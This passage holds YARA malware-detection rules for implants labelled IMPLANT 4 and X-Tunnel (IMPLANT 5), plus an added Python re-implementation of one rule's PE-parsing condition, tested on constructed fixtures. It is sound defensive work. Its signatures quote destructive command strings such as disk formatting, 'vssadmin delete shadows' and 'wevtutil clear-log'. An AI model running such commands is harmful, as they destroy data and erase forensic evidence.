00 2E 00 31 00 2E 00 37 00 36 00 30 00 30 00 2E 00 31 00 36 00 33 00 38 00 35 00 00 00 00 00 44 00 
00 00 01 00 56 00 61 00 72 00 46 00 69 00 6C 00 65 00 49 00 6E 00 66 00 6F 00 00 00 00 00 24 00 04 
00 00 00 54 00 72 00 61 00 6E 00 73 00 6C 00 61 00 74 00 69 00 6F 00 6E 00 00 00 00 00 09 04 B0 04}

$b5 = {78 03 34 00 00 00 56 00 53 00 5F 00 56 00 45 00 52 00 53 00 49 00 4F 00 4E 00 5F 00 49 
00 4E 00 46 00 4F 00 00 00 00 00 BD 04 EF FE 00 00 01 00 00 00 05 00 6A 44 B1 1D 00 00 05 00 6A
44 B1 1D 3F 00 00 00 00 00 00 00 04 00 04 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D6 02
00 00 01 00 53 00 74 00 72 00 69 00 6E 00 67 00 46 00 69 00 6C 00 65 00 49 00 6E 00 66 00 6F 00 00 
00 B2 02 00 00 01 00 30 00 34 00 30 00 39 00 30 00 34 00 42 00 30 00 00 00 4C 00 16 00 01 00 43 00
6F 00 6D 00 70 00 61 00 6E 00 79 00 4E 00 61 00 6D 00 65 00 00 00 00 00 4D 00 69 00 63 00 72 00 6F 
00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F 00 72 00 61 00 74 00 69 00 6F 00 6E 00 
00 00 4E 00 13 00 01 00 46 00 69 00 6C 00 65 00 44 00 65 00 73 00 63 00 72 00 69 00 70 00 74 00 69 00 
6F 00 6E 00 00 00 00 00 57 00 69 00 6E 00 64 00 6F 00 77 00 73 00 AE 00 53 00 79 00 73 00 55 00 74 
00 69 00 6C 00 69 00 74 00 79 00 00 00 00 00 72 00 29 00 01 00 46 00 69 00 6C 00 65 00 56 00 65 00 

72 00 73 00 69 00 6F 00 6E 00 00 00 00 00 35 00 2E 00 30 00 2E 00 37 00 36 00 30 00 31 00 2E 00 31 
00 37 00 35 00 31 00 34 00 20 00 28 00 77 00 69 00 6E 00 37 00 73 00 70 00 31 00 5F 00 72 00 74 00 
6D 00 2E 00 31 00 30 00 31 00 31 00 31 00 39 00 2D 00 31 00 38 00 35 00 30 00 29 00 00 00 00 00 30 
00 08 00 01 00 49 00 6E 00 74 00 65 00 72 00 6E 00 61 00 6C 00 4E 00 61 00 6D 00 65 00 00 00 6D 00 

73 00 69 00 65 00 78 00 65 00 63 00 00 00 80 00 2E 00 01 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 
00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 A9 00 20 00 4D 00 69 00 63 00 72 00 6F 00 73 00 
6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F 00 72 00 61 00 74 00 69 00 6F 00 6E 00 2E 00 20 
00 41 00 6C 00 6C 00 20 00 72 00 69 00 67 00 68 00 74 00 73 00 20 00 72 00 65 00 73 00 65 00 72 00 
76 00 65 00 64 00 2E 00 00 00 40 00 0C 00 01 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 
00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 6D 00 73 00 69 00 65 00 78 00 65 00 63 00 2E 00 
65 00 78 00 65 00 00 00 58 00 1C 00 01 00 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 4E 00 61 00 6D 
00 65 00 00 00 00 00 57 00 69 00 6E 00 64 00 6F 00 77 00 73 00 53 00 79 00 73 00 55 00 74 00 69 00 
6C 00 69 00 74 00 79 00 20 00 2D 00 20 00 55 00 6E 00 69 00 63 00 6F 00 64 00 65 00 00 00 42 00 0F
00 01 00 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 56 00 65 00 72 00 73 00 69 00 6F 00 6E 00 00 00 35 
00 2E 00 30 00 2E 00 37 00 36 00 30 00 31 00 2E 00 31 00 37 00 35 00 31 00 34 00 00 00 00 00 44 00 
00 00 01 00 56 00 61 00 72 00 46 00 69 00 6C 00 65 00 49 00 6E 00 66 00 6F 00 00 00 00 00 24 00 04 
00 00 00 54 00 72 00 61 00 6E 00 73 00 6C 00 61 00 74 00 69 00 6F 00 6E 00 00 00 00 00 09 04 B0 04}

$b6 = {D4 02 34 00 00 00 56 00 53 00 5F 00 56 00 45 00 52 00 53 00 49 00 4F 00 4E 00 5F 00 49 
00 4E 00 46 00 4F 00 00 00 00 00 BD 04 EF FE 00 00 01 00 01 00 05 00 88 15 28 0A 01 00 05 00 88 15
28 0A 17 00 00 00 00 00 00 00 04 00 04 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 02 00 00
01 00 53 00 74 00 72 00 69 00 6E 00 67 00 46 00 69 00 6C 00 65 00 49 00 6E 00 66 00 6F 00 00 00 10 
02 00 00 01 00 30 00 34 00 30 00 39 00 30 00 34 00 65 00 34 00 00 00 4C 00 16 00 01 00 43 00 6F 00 
6D 00 70 00 61 00 6E 00 79 00 4E 00 61 00 6D 00 65 00 00 00 00 00 4D 00 69 00 63 00 72 00 6F 00 73 
00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F 00 72 00 61 00 74 00 69 00 6F 00 6E 00 00 00 
4E 00 13 00 01 00 46 00 69 00 6C 00 65 00 44 00 65 00 73 00 63 00 72 00 69 00 70 00 74 00 69 00 6F 
00 6E 00 00 00 00 00 53 00 65 00 72 00 69 00 61 00 6C 00 20 00 50 00 6F 00 72 00 74 00 20 00 44 00 

72 00 69 00 76 00 65 00 72 00 00 00 00 00 62 00 21 00 01 00 46 00 69 00 6C 00 65 00 56 00 65 00 72 00 

73 00 69 00 6F 00 6E 00 00 00 00 00 35 00 2E 00 31 00 2E 00 32 00 36 00 30 00 30 00 2E 00 35 00 35 
00 31 00 32 00 20 00 28 00 78 00 70 00 73 00 70 00 2E 00 30 00 38 00 30 00 34 00 31 00 33 00 2D 00 
30 00 38 00 35 00 32 00 29 00 00 00 00 00 4A 00 13 00 01 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 
00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 
00 20 00 28 00 43 00 29 00 20 00 32 00 30 00 30 00 34 00 00 00 00 00 6A 00 25 00 01 00 50 00 72 00 6F 
00 64 00 75 00 63 00 74 00 4E 00 61 00 6D 00 65 00 00 00 00 00 4D 00 69 00 63 00 72 00 6F 00 73 00 
6F 00 66 00 74 00 AE 00 20 00 57 00 69 00 6E 00 64 00 6F 00 77 00 73 00 AE 00 20 00 4F 00 70 00 65 
00 72 00 61 00 74 00 69 00 6E 00 67 00 20 00 53 00 79 00 73 00 74 00 65 00 6D 00 00 00 00 00 40 00 
0E 00 01 00 50 00 72 00 6F 00 64 00 75 00 63 00 74 00 56 00 65 00 72 00 73 00 69 00 6F 00 6E 00 00
00 35 00 2E 00 31 00 2E 00 32 00 36 00 30 00 30 00 2E 00 35 00 35 00 31 00 32 00 00 00 44 00 00 00 
01 00 56 00 61 00 72 00 46 00 69 00 6C 00 65 00 49 00 6E 00 66 00 6F 00 00 00 00 00 24 00 04 00 00
00 54 00 72 00 61 00 6E 00 73 00 6C 00 61 00 74 00 69 00 6F 00 6E 00 00 00 00 00 09 04 E4 04} 

condition:

(uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and (((any of ($a*)) and (uint32(uint32(0x3C)+8) == 0x00000000)) or (for any of ($b*): ($ in (uint32(uint32(0x3C)+248+(40*(uint16(uint32(0x3C)+6)-1)+20))..(uint32(uint32(0x3C)+248+(40*(uint16(uint32(0x3C)+6)-1)+20))+uint32(uint32(0x3C)+248+(40*(uint16(uint32(0x3C)+6)-1)+16)))))))

}
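The IMPLANT_4_v3 condition above does its own PE header walk: it takes the last section header (pe+248+40*(NumberOfSections-1)), reads its PointerToRawData (+20) and SizeOfRawData (+16), and only accepts a $b* version-resource match that falls inside that raw range, or else any $a* string in an image whose COFF TimeDateStamp is zero. The Python below is an added example, not code from the DHS report: it re-implements that arithmetic over a constructed PE32 fixture so the offsets can be checked against real images. The 248 the rule hard-codes assumes a 224-byte PE32 optional header; a PE32+ optional header is 240 bytes, so the rule's range computation does not apply to 64-bit images. Function names, the fixture builder and the VS_VERSION_INFO stand-in blob are my own.

```python
import struct

# PE layout constants the YARA condition hard-codes. 248 = 4 ("PE\0\0") + 20 (COFF
# header) + 224 (PE32 optional header). PE32+ has a 240-byte optional header, so
# these offsets are only valid for 32-bit images.
E_LFANEW = 0x3C
PE_SIGNATURE = 0x00004550
SECTION_TABLE_OFFSET = 248
SECTION_HEADER_SIZE = 40


def u16(data, off):
    return struct.unpack_from("<H", data, off)[0]


def u32(data, off):
    return struct.unpack_from("<I", data, off)[0]


def last_section_raw_range(data):
    """(start, end) of the last section's raw data, computed exactly as the rule does:
    start = uint32(pe+248+40*(NumberOfSections-1)+20)      # PointerToRawData
    end   = start + uint32(pe+248+40*(NumberOfSections-1)+16)  # SizeOfRawData"""
    pe = u32(data, E_LFANEW)
    last_hdr = pe + SECTION_TABLE_OFFSET + SECTION_HEADER_SIZE * (u16(data, pe + 6) - 1)
    start = u32(data, last_hdr + 20)
    return start, start + u32(data, last_hdr + 16)


def implant4_v3_condition(data, a_strings, b_blobs):
    """Python rendering of the IMPLANT_4_v3 condition over an in-memory file image."""
    if len(data) < 0x40 or u16(data, 0) != 0x5A4D:             # "MZ"
        return False
    pe = u32(data, E_LFANEW)
    if pe + 24 > len(data) or u32(data, pe) != PE_SIGNATURE:    # "PE\0\0"
        return False
    # Branch 1: (any of ($a*)) and TimeDateStamp == 0. The $a strings are declared
    # 'wide nocase', so compare their UTF-16LE encoding case-insensitively.
    lowered = data.lower()
    if any(s.encode("utf-16-le").lower() in lowered for s in a_strings) and u32(data, pe + 8) == 0:
        return True
    # Branch 2: for any of ($b*): $ in (start..end), i.e. some match offset of some
    # $b lies inside the last section's raw data (YARA's range is inclusive).
    start, end = last_section_raw_range(data)
    for blob in b_blobs:
        off = data.find(blob)
        while off != -1:
            if start <= off <= end:
                return True
            off = data.find(blob, off + 1)
    return False


def build_sample_pe32(section_payloads, timestamp=0x5A000000):
    """Constructed minimal PE32 image (test fixture, not a real sample): one 0x100-byte
    raw section per payload, raw data starting at file offset 0x200."""
    dos = bytearray(0x40)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, E_LFANEW, 0x40)
    # Machine, NumberOfSections, TimeDateStamp, PtrToSymTab, NumSyms, SizeOfOptionalHeader, Characteristics
    coff = struct.pack("<HHIIIHH", 0x14C, len(section_payloads), timestamp, 0, 0, 224, 0x0102)
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                       # PE32 magic
    headers = bytes(dos) + b"PE\0\0" + coff + bytes(opt)
    raw_ptr, body = 0x200, b""
    for i, payload in enumerate(section_payloads):
        raw = payload.ljust(0x100, b"\0")
        # Name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData,
        # PtrToRelocs, PtrToLinenums, NumRelocs, NumLinenums, Characteristics
        headers += struct.pack("<8sIIIIIIHHI", b".s%d" % i, len(raw), 0x1000 * (i + 1),
                               len(raw), raw_ptr, 0, 0, 0, 0, 0x40000040)
        raw_ptr += len(raw)
        body += raw
    return headers.ljust(0x200, b"\0") + body


# The rule's four $a strings, and a constructed stand-in for the $b1..$b6 blobs
# (each of which begins with a VS_VERSION_INFO resource header).
A_STRINGS = ["Adobe Flash Player Installer", "regedt32.exe", "WindowsSysUtility", "USB MDM Driver"]
VERSION_BLOB = b"\x34\x00\x00\x00" + "VS_VERSION_INFO".encode("utf-16-le")


def demo():
    """Outcomes of the condition on four fixtures: blob in the last section, blob in the
    first section, $a string with a zero timestamp, $a string with a real timestamp."""
    in_last = build_sample_pe32([b"code", VERSION_BLOB])
    in_first = build_sample_pe32([VERSION_BLOB, b"data"])
    a_zero_ts = build_sample_pe32(["USB MDM Driver".encode("utf-16-le"), b"x"], timestamp=0)
    a_real_ts = build_sample_pe32(["USB MDM Driver".encode("utf-16-le"), b"x"])
    return tuple(implant4_v3_condition(img, A_STRINGS, [VERSION_BLOB])
                 for img in (in_last, in_first, a_zero_ts, a_real_ts))


if __name__ == "__main__":
    print(demo())   # (True, False, True, False)
```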


rule IMPLANT_4_v4

{

strings: 

$DK_format1 = "/c format %c: /Y /Q" ascii
$DK_format2 = "/c format %c: /Y /X /FS:NTFS" ascii
$DK_physicaldrive = "PhysicalDrive%d" wide 
$DK_shutdown = "shutdown /r /t %d" 

$MZ = {4d 5a} 
condition: 

$MZ at 0 and all of ($DK*)

}


rule IMPLANT_4_v5

{


strings: 

$GEN_HASH = {0F BE C9 C1 C0 07 33 C1}
condition: 
(uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C) and all of them

} 


rule IMPLANT_4_v6

{


strings: 

$STR1 = "DispatchCommand" wide ascii 
$STR2 = "DispatchEvent" wide ascii 
condition: 

(uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C) and all of them

} 

rule IMPLANT_4_v7

{

strings: 


$sb1 = {C7 [1-5] 33 32 2E 64 C7 [1-5] 77 73 32 5F 66 C7 [1-5] 6C 6C}
$sb2 = {C7 [1-5] 75 73 65 72 C7 [1-5] 33 32 2E 64 66 C7 [1-5] 6C 6C}
$sb3 = {C7 [1-5] 61 64 76 61 C7 [1-5] 70 69 33 32 C7 [1-5] 2E 64 6C 6C}
$sb4 = {C7 [1-5] 77 69 6E 69 C7 [1-5] 6E 65 74 2E C7 [1-5] 64 6C 6C}
$sb5 = {C7 [1-5] 73 68 65 6C C7 [1-5] 6C 33 32 2E C7 [1-5] 64 6C 6C}
$sb6 = {C7 [1-5] 70 73 61 70 C7 [1-5] 69 2E 64 6C 66 C7 [1-5] 6C}
$sb7 = {C7 [1-5] 6E 65 74 61 C7 [1-5] 70 69 33 32 C7 [1-5] 2E 64 6C 6C}
$sb8 = {C7 [1-5] 76 65 72 73 C7 [1-5] 69 6F 6E 2E C7 [1-5] 64 6C 6C}
$sb9 = {C7 [1-5] 6F 6C 65 61 C7 [1-5] 75 74 33 32 C7 [1-5] 2E 64 6C 6C}
$sb10 = {C7 [1-5] 69 6D 61 67 C7 [1-5] 65 68 6C 70 C7 [1-5] 2E 64 6C 6C}
condition:

(uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C) and 3 of them

}


rule IMPLANT_4_v8

{


strings: 

$f1 = {5E 81 EC 04 01 00 00 8B D4 68 04 01 00 00 52 6A 00 FF 57 1C 8B D4 33 C9 03 D0 4A 41
3B C8 74 05 80 3A 5C 75 F5 42 81 EC 04 01 00 00 8B DC 52 51 53 68 04 01 00 00 FF 57 20 59 5A 66 
C7 04 03 5C 20 56 57 8D 3C 03 8B F2 F3 A4 C6 07 00 5F 5E 33 C0 50 68 80 00 00 00 6A 02 50 50 68
00 00 00 40 53 FF 57 14 53 8B 4F 4C 8B D6 33 DB 30 1A 42 43 3B D9 7C F8 5B 83 EC 04 8B D4 50 
6A 00 52 FF 77 4C 8B D6 52 50 FF 57 24 FF 57 18} 

$f2 = {5E 83 EC 1C 8B 45 08 8B 4D 08 03 48 3C 89 4D E4 89 75 EC 8B 45 08 2B 45 10 89 45 E8 
33 C0 89 45 F4 8B 55 0C 3B 55 F4 0F 86 98 00 00 00 8B 45 EC 8B 4D F4 03 48 04 89 4D F4 8B 55 EC
8B 42 04 83 E8 08 D1 E8 89 45 F8 8B 4D EC 83 C1 08 89 4D FC}

$f3 = {5F 8B DF 83 C3 60 2B 5F 54 89 5C 24 20 8B 44 24 24 25 00 00 FF FF 66 8B 18 66 81 FB 
4D 5A 74 07 2D 00 00 01 00 EB EF 8B 48 3C 03 C8 66 8B 19 66 81 FB 50 45 75 E0 8B E8 8B F7 83
EC 60 8B FC B9 60 00 00 00 F3 A4 83 EF 60 6A 0D 59 E8 88 00 00 00 E2 F9 68 6C 33 32 00 68 73 68
65 6C 54 FF 57} 

$a1 = {83 EC 04 60 E9 1E 01 00 00}
condition: 


$a1 at entrypoint or any of ($f*)

}


rule IMPLANT_4_v9

{


strings: 

$a = "wevtutil clear-log" ascii wide nocase 

$b = "vssadmin delete shadows" ascii wide nocase 
$c = "Global\\23d1a259-88fa-41df-935f-cae523bab8e6" ascii wide nocase
$d = "Global\\07fd3ab3-0724-4cfd-8cc2-60c0e450bb9a" ascii wide nocase 
//$e = {57 55 33 c9 51 8b c3 99 57 52 50} 

$openPhysicalDiskOverwriteWithZeros = { 57 55 33 C9 51 8B C3 99 57 52 50 E8 ?? ?? ?? ?? 52 50
E8 ?? ?? ?? ?? 83 C4 10 84 C0 75 21 33 C0 89 44 24 10 89 44 24 14 6A 01 8B C7 99 8D 4C 24 14 51 52
50 56 FF 15 ?? ?? ?? ?? 85 C0 74 0B 83 C3 01 81 FB 00 01 00 00 7C B6 }

$f = {83 c4 0c 53 53 6a 03 53 6a 03 68 00 00 00 c0}

condition: 

($a and $b) or $c or $d or ($openPhysicalDiskOverwriteWithZeros and $f)

} 


rule IMPLANT_4_v10

{


strings: 

$ = {A1B05C72}
$ = {EB3D0384}
$ = {6F45594E}
$ = {71815A4E}
$ = {D5B03E72}
$ = {6B43594E}
$ = {F572993D}
$ = {665D9DC0}
$ = {0BE7A75A}
$ = {F37443C5}
$ = {A2A474BB}
$ = {97DEEC67}
$ = {7E0CB078}
$ = {9C9678BF}
$ = {4A37A149}
$ = {8667416B}
$ = {0A375BA4}
$ = {DC505A8D}
$ = {02F1F808}
$ = {2C819712}
condition: 


uint16(0) == 0x5A4D and uint16(uint32(0x3c)) == 0x4550 and 15 of them

} 


rule IMPLANT_4_v11

{

strings: 

$ = "/c format %c: /Y /X /FS:NTFS"

$ = ".exe.sys.drv.doc.docx.xls.xlsx.mdb.ppt.pptx.xml.jpg.jpeg.ini.inf.ttf" wide 
$ = ".dll.exe.xml.ttf.nfo.fon.ini.cfg.boot.jar" wide 
$ = ".crt.bin.exe.db.dbf.pdf.djvu.doc.docx.xls.xlsx.jar.ppt.pptx.tib.vhd.iso.lib.mdb.accdb.sql.mdf.xml.rtf.ini.cfg.boot.txt.rar.msi.zip.jpg.bmp.jpeg.tiff" wide

$tempfilename = "%ls_%ls_%ls_%d.~tmp" ascii wide 

condition: 

(uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C) and 2 of them

} 

rule IMPLANT_4_v12

{

strings:

$CMP1 = {81 ?? 4D 5A 00 00}

$SUB1 = {81 ?? 00 10 00 00} 

$CMP2 = {66 81 38 4D 5A} 

$SUB2 = {2D 00 10 00 00}

$HAL = "HAL.dll" 

$OUT = {E6 64 E9 ?? ?? FF FF} 
condition: 

(uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C) and ($CMP1 or $CMP2) and ($SUB1 or $SUB2) and $OUT and $HAL

}


rule IMPLANT_4_v13

{


strings: 

$XMFDOM1 = {81 BF 33 29 36 7B D2 11 B2 0E 00 C0 4F 98 3E 60}

$XMFDOM2 = {90 BF 33 29 36 7B D2 11 B2 0E 00 C0 4F 98 3E 60}

$XMFPARSE = {8B 06 [0-2] 8D 55 ?C 52 FF 75 08 [0-2] 50 FF 91 04 01 00 00 66 83 7D ?C FF 75
3? 8B 06 [0-2] 8D 55 F? 52 50 [0-2] FF 51 30 85 C0 78 2?}

$EXP1 = "DispatchCommand" 

$EXP2 = "DispatchEvent" 

$BDATA = { 85 C0 74 1? 0F B7 4? 06 83 C? 28 [0-6] 72 ?? 33 C0 5F 5E 5B 5D C2 08 00 8B 4?
0? 8B 4? 0? 89 01 8B 4? 0C 03 [0-2] EB E?}

condition: 

(uint16(0) == 0x5A4D or uint16(0) == 0xCFD0 or uint16(0) == 0xC3D4 or uint32(0) == 0x46445025 or uint32(1) == 0x6674725C) and all of them

}
The following YARA rules detect X-Tunnel, referred to as IMPLANT 5 in the rule naming convention.

IMPLANT 5 Rules: 

rule IMPLANT_5_v1

{

strings: 

$hexstr = {2D 00 53 00 69 00 00 00 2D 00 53 00 70 00 00 00 2D 00 55 00 70 00 00 00 2D 00 50 00 
69 00 00 00 2D 00 50 00 70 00 00 00} 

$UDPMSG1 = "error 2005 recv from server UDP - %d\x0a" 

$TPSMSG1 = "error 2004 send to TPS - %d\x0a" 

$TPSMSG2 = "error 2003 recv from TPS - %d\x0a"

$UDPMSG2 = "error 2002 send to server UDP - %d\x0a"

condition: 

any of them

}


rule IMPLANT_5_v2

{


strings: 

$key0 = { 987AB999FE0924A2DF0A412B14E26093746FCDF9BA31DC05536892C33B116AD3 } 
$key1 = { 8B236C892D902B0C9A6D37AE4F9842C3070FBDC14099C6930158563C6AC00FF5 }
$key2 = { E47B7F110CAA1DA617545567EC972AF3A6E7B4E6807B7981D3CFBD3D8FCC3373 } 
$key3 = { 48B284545CA1FA74F64FDBE2E605D68CED8A726D05EBEFD9BAAC164A7949BDC1 } 
$key4 = { FB421558E30FCCD95FA7BC45AC92D2991C44072230F6FBEAA211341B5BF2DC56 } 
$key5 = { 34F1AE17017AF16021ADA5CE3F77675BBC6E7DEC6478D6078A0B22E5FDFF3B31 } 
$key6 = { F0EA48F164395186E6F754256EBB812A2AFE168E77ED9501F8B8E6F5B72126A7 }

$key7 = { 0B6E9970A8EAF68EE14AB45005357A2F3391BEAA7E53AB760B916BC2B3916ABE } 
$key8 = { FF032EA7ED2436CF6EEA1F741F99A3522A61FDA8B5A81EC03A8983ED1AEDAB1A } 
$key9 = { F0DAC1DDFEF7AC6DE1CBE1006584538FE650389BF8565B32E0DE1FFACBCB14BB } 

$key10 = { A5D699A3CD4510AF11F1AF767602055C523DF74B94527D74319D6EFC6883B80D }

$key11 = { 5951B02696C1D5A7B2851D28872384DA607B25F4CEA268FF3FD7FBA75AB3B4B3 }
$key12 = { 0465D99B26AF42D8346001BB838595E301BAD8CF5D40CE9C17C944717DF82481 }
$key13 = { 5DFE1C83AD5F5CE1BF5D9C42E23225E3ECFDB2493E80E6554A2AC7C722EB4880 }
$key14 = { E9650396C45F7783BC14C59F46EA8232E8357C26B5627BFF8C42C6AE2E0F2E17 }
$key15 = { 7432AE389125BB4E3980ED7F6A6FB252A42E785A90F4591C3620CA642FF97CA3 }
$key16 = { 2B2ADBBC4F960A8916F7088067BAD30BE84B65783FBF9476DF5FDA0E5856B183 }
$key17 = { 808C3FD0224A59384161B8A81C8BB404D7197D16D8118CB77067C5C8BD764B3E }
$key18 = { 028B0E24D5675C16C815BFE4A073E9778C668E65771A1CE881E2B03F58FC7D5B }
$key19 = { 878B7F5CF2DC72BAF1319F91A4880931EE979665B1B24D3394FE72EDFAEF4881 }
$key20 = { 7AC7DD6CA34F269481C526254D2F563BC6ECA1779FEEAA33EC1C20E60B686785 } 
$key21 = { 3044F1D394186815DD8E3A2BBD9166837D07FA1CF6A550E2C170C9CDD9305209 } 
$key22 = { 7544DC095C441E39D258648FE9CB1267D20D83C8B2D3AB734474401DA4932619 } 
$key23 = { D702223347406C1999D1A9829CBBE96EC86D377A40E2EE84562EA1FAC1C71498 } 
$key24 = { CA36CB1177382A1009D392A58F7C1357E94AD2292CC0AE82EE4F7DB0179148E1 } 
$key25 = { C714F23E4C1C4E55F0E1FA7F5D0DD64658A86F84681D07576D840784154F65DC } 
$key26 = { 63571BAF736904634AFEE2A70CB9ED64615DE8CA7AEF21E773286B8877D065DB } 
$key27 = { 27808A9BE98FFE348DE1DB999AC9FDFB26E6C5A0D5E688490EF3D186C43661EB } 
$key28 = { B6EB86A07A85D40866AFA100789FFB9E85C13F5AA7C7A3B6BA753C7EAB9D6A62 } 
$key29 = { 88F0020375D60BDB85ACDBFE4BD79CD098DB2B3FA2CEF55D4331DBEFCE455157 } 
$key30 = { 36535AAB296587AE1162AC5D39492DD1245811C72706246A38FF590645AA5D7B } 
$key31 = { FDB726261CADD52E10818B49CAB81BEF112CB63832DAA26AD9FC711EA6CE99A4 } 
$key32 = { 86C0CAA26D9FD07D215BC7EB14E2DA250E905D406AFFAB44FB1C62A2EAFC4670 } 
$key33 = { BC101329B0E3A7D13F6EBC535097785E27D59E92D449D6D06538725034B8C0F0 } 




$key34 = { C8D31A78B7C149F62F06497F9DC1DDC4967B566AC52C3A2A65AC7A99643B8A2D }
$key35 = { 0EA4A5C565EFBB94F5041392C5F0565B6BADC630D9005B3EADD5D81110623E1F }
$key36 = { 06E4E46BD3A0FFC8A4125A6A02B0C56D5D8B9E378CF97539CE4D4ADFAF89FEB5 }
$key37 = { 6DE22040821F0827316291331256A170E23FA76E381CA7066AF1E5197AE3CFE7 }
$key38 = { C6EF27480F2F6F40910074A45715143954BBA78CD74E92413F785BBA5B2AA121 }
$key39 = { 19C96A28F8D9698ADADD2E31F2426A46FD11D2D45F64169EDC7158389BFA59B4 }
$key40 = { C3C3DDBB9D4645772373A815B5125BB2232D8782919D206E0E79A6A973FF5D36 }
$key41 = { C33AF1608037D7A3AA7FB860911312B4409936D236564044CFE6ED42E54B78A8 }
$key42 = { 856A0806A1DFA94B5E62ABEF75BEA3B657D9888E30C8D2FFAEC042930BBA3C90 }
$key43 = { 244496C524401182A2BC72177A15CDD2EF55601F1D321ECBF2605FFD1B9B8E3F }
$key44 = { DF24050364168606D2F81E4D0DEB1FFC417F1B5EB13A2AA49A89A1B5242FF503 }
$key45 = { 54FA07B8108DBFE285DD2F92C84E8F09CDAA687FE492237F1BC4343FF4294248 }
$key46 = { 23490033D6BF165B9C45EE65947D6E6127D6E00C68038B83C8BFC2BCE905040C }
$key47 = { 4E044025C45680609B6EC52FEB3491130A711F7375AAF63D69B9F952BEFD5F0C }
$key48 = { 019F31C5F5B2269020EBC00C1F511F2AC23E9D37E89374514C6DA40A6A03176C }
$key49 = { A2483197FA57271B43E7276238468CFB8429326CBDA7BD091461147F642BEB06 }
$key50 = { 731C9D6E74C589B7ACB019E5F6A6E07ACF12E68CB9A396CE05AA4D69D5387048 }
$key51 = { 540DB6C8D23F7F7FEF9964E53F445F0E56459B10E931DEEEDB2B57B063C7F8B7 }
$key52 = { D5AF80A7EEFF26DE988AC3D7CE23E62568813551B2133F8D3E973DA15E355833 }
$key53 = { E4D8DBD3D801B1708C74485A972E7F00AFB45161C791EE05282BA68660FFBA45 }
$key54 = { D79518AF96C920223D687DD596FCD545B126A678B7947EDFBF24661F232064FB }
$key55 = { B57CAA4B45CA6E8332EB58C8E72D0D9853B3110B478FEA06B35026D7708AD225 }
$key56 = { 077C714C47DFCF79CA2742B1544F4AA8035BB34AEA9D519DEE77745E01468408 }
$key57 = { C3F5550AD424839E4CC54FA015994818F4FB62DE99B37C872AF0E52C376934FA }
$key58 = { 5E890432AE87D0FA4D209A62B9E37AAEDEDC8C779008FEBAF9E4E6304D1B2AAC }
$key59 = { A42EDE52B5AF4C02CFE76488CADE36A8BBC3204BCB1E05C402ECF450071EFCAB }
$key60 = { 4CDAFE02894A04583169E1FB4717A402DAC44DA6E2536AE53F5F35467D31F1CA }
$key61 = { 0BEFCC953AD0ED6B39CE6781E60B83C0CFD166B124D1966330CBA9ADFC9A7708 }
$key62 = { 8A439DC4148A2F4D5996CE3FA152FF702366224737B8AA6784531480ED8C8877 }
$key63 = { CF253BE3B06B310901FF48A351471374AD35BBE4EE654B72B860F2A6EC7B1DBB }
$key64 = { A0599F50C4D059C5CFA16821E97C9596B1517B9FB6C6116F260415127F32CE1F }
$key65 = { 8B6D704F3DC9150C6B7D2D54F9C3EAAB14654ACA2C5C3952604E65DF8133FE0C }
$key66 = { A06E5CDD3871E9A3EE17F7E8DAE193EE47DDB87339F2C599402A78C15D77CEFD }
$key67 = { E52ADA1D9BC4C089DBB771B59904A3E0E25B531B4D18B58E432D4FA0A41D9E8A }
$key68 = { 4778A7E23C686C171FDDCCB8E26F98C4CBEBDF180494A647C2F6E7661385F05B }
$key69 = { FE983D3A00A9521F871ED8698E702D595C0C7160A118A7630E8EC92114BA7C12 }
$key70 = { 52BA4C52639E71EABD49534BBA80A4168D15762E2D1D913BAB5A5DBF14D9D166 }
$key71 = { 931EB8F7BC2AE1797335C42DB56843427EB970ABD601E7825C4441701D13D7B1 }
$key72 = { 318FA8EDB989672DBE2B5A74949EB6125727BD2E28A4B084E8F1F50604CCB735 }
$key73 = { 5B5F2315E88A42A7B59C1B493AD15B92F819C021BD70A5A6619AAC6666639BC2 }
$key74 = { C2BED7AA481951FEB56C47F03EA38236BC425779B2FD1F1397CB79FE2E15C0F0 }
$key75 = { D3979B1CB0EC1A655961559704D7CDC019253ACB2259DFB92558B7536D774441 }
$key76 = { 0EDF5DBECB772424D879BBDD51899D6AAED736D0311589566D41A9DBB8ED1CC7 }
$key77 = { CC798598F0A9BCC82378A5740143DEAF1A147F4B2908A197494B7202388EC905 }
$key78 = { 074E9DF7F859BF1BD1658FD2A86D81C282000EAB09AF4252FAB45433421D3849 }
$key79 = { 6CD540642E007F00650ED20D7B54CFFD54DDA95D8DEBB087A004BAE222F22C8E }
$key80 = { C76CF2F66C71F6D17FC8DEFA1CAEF8718BA1CE188C7EA02C835A0FA54D3B3314 }
$key81 = { A7250A149600E515C9C40FE5720756FDA8251635A3B661261070CB5DABFE7253 }
$key82 = { 237C67B97D4CCE4610DE2B82E582808EA796C34A4C24715C953CBA403B2C935E }
$key83 = { A8FA182547E66B57C497DAAA195A38C0F0FB0A3C1F7B98B4B852F5F37E885127 }
